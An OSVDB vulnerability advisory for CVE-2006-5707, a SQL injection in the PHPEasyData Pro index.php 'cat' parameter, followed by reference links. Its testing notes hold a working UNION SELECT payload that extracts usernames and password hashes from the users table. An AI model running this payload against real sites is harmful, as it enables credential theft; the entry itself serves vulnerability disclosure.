PHPEasyData Pro index.php cat Variable SQL Injection

2006-10-29T12:48:47
ID OSVDB:30130
Type osvdb
Reporter OSVDB
Modified 2006-10-29T12:48:47

Description

Manual Testing Notes

/index.php?cat=-1//union//select//0,concat(user_login,char(32),user_pass),0,0//from//an_users//where/*/user_id%20like%205/

References:

Security Tracker: 1017137
Secunia Advisory ID: 22616
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0485.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0484.html
ISS X-Force ID: 29866
Generic Exploit URL: http://milw0rm.com/exploits/2675
FrSIRT Advisory: ADV-2006-4263
CVE-2006-5707